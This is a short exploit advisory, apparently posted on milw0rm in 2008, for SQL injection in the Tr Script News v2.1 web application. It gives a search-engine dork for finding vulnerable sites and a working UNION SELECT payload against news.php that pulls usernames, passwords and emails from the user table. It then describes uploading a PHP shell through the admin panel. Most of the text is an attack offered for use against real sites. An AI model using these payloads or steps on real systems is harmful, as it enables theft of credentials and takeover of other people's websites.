########################################################
# #
# Discovered by : His0k4 {Algerian HaCker} #
# #
# Email : His0k4.hlm[at]gmail[dot]com #
# #
# Greetz to: All Dz & muslims HaCkeRs :) #
# #
# Special Greetz:c02,Spym4n,THe-MooRiSH #
# #
########################################################
#
# Script : Tr Script News v2.1
#
# Download script : http://www.easy-script.com/scripts-dl/trscript-21.zip
#
# Dork : inurl:news.php?mode=voir
#
# Vulnerable file : news.php
#
# P.O.C
# http://www.victime.com/[news_path]/news.php?mode=voir&nb=[SQL]
#
# Exemple:
# http://www.victime.com/[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
#
# Admin login: /admin
#
# Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php"
#
#############################################################################
# milw0rm.com [2008-04-21]